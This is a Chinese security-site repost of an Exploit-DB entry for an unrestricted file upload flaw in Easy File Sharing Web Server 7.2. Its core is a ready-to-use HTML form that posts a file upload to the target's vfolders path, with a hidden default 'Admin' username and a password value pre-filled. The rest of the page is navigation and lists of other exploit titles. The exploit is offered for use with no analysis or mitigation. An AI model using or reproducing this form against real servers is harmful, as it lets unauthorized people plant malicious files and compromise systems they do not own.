首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Easy File Sharing Web Server 7.2 - Unrestricted File Upload 来源：https://www.exploit-db.com 作者：Chako 发布时间：2017-06-29   ################################## #   2017/6/15  Chako #  #   EFS Web Server 7.2 Unrestricted File Upload #   Vendor Homepage: http://www.sharing-file.com #   Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe #   Version: Easy File Sharing Web Server 7.2 #   Tested on: WinXP SP3 ##################################         EFS Web Server 7.2 allows unauthorized users to upload malicious files           [Exploit]   // action="http://target_host/disk_c/vfolders // </script><input size="20" name="upload_author" value="Admin" type="hidden"> // have to know the user name by Default "Admin"       <form action="http://192.168.136.129/disk_c/vfolders" name="post" onsubmit="return input(this)" enctype="multipart/form-data" method="post"> <input name="uploadid" id="uploadid" value="34533689" type="hidden">           <center>             <a name="reply"></a>             <table class="forumline" cellpadding="6" width="479">               <tbody><tr bgcolor="#8080A6">                 <td bgcolor="#eff2f8" height="319">                   <center>   <script language="JavaScript"> <!-- document.write('<input type="hidden" size="20" name="upload_author" Value="'+ReadCookie("UserID")+'">'); // --> </script><input size="20" name="upload_author" value="Admin" type="hidden"> <script language="JavaScript"> <!-- document.write('<input type="hidden" size="20" name="upload_passwd" Value="'+ReadCookie("PassWD")+'">'); // --></script><input size="20" name="upload_passwd" value="829700" type="hidden">                       <table cellpadding="0" border="0" width="437">                       <tbody><tr>                         <td colspan="2" height="63"> <span class="bgen">Description:</span> <br>                           <input name="upload_title" id="upload_title" size="50" value="dd" type="text">                           </td>                       </tr>                       <tr>                         <td colspan="2"><span class="bgen">File:</span> <br>                           <input name="UploadedFile" id="UploadedFile" size="50" type="file">                           <br> </td>                       </tr>                       <tr> </tr> <tr>                           <td colspan="2" height="40"><font size="2" face="Arial, Helvetica, sans-serif" color="#FFFFFF">                           <input name="Upload" class="button" value="Upload" type="submit">                           </font>                         </td>                       </tr>                     </tbody></table>                   </center></td>               </tr>             </tbody></table>                        </center>         </form>         [/Exploit]   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Easy File Sharing Web Server 7 ·Oracle Solaris 11.1 / 11.3 RSH ·FASM 1.7.21 Buffer Overflow ·OpenBSD - 'at' Local Root Stac ·Microsoft Word MTA Handler Rem ·NetBSD - Stack Clash Proof of ·Easy File Sharing Web Server 7 ·Linux - 'offset2lib' Stack Cla ·Microsoft Skype 7.2 / 7.35 / 7 ·Linux - 'ldso_hwcap' Local Roo ·IBM DB2 9.7 / 10.1 / 10.5 / 11 ·Linux - 'ldso_hwcap_64' Local   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved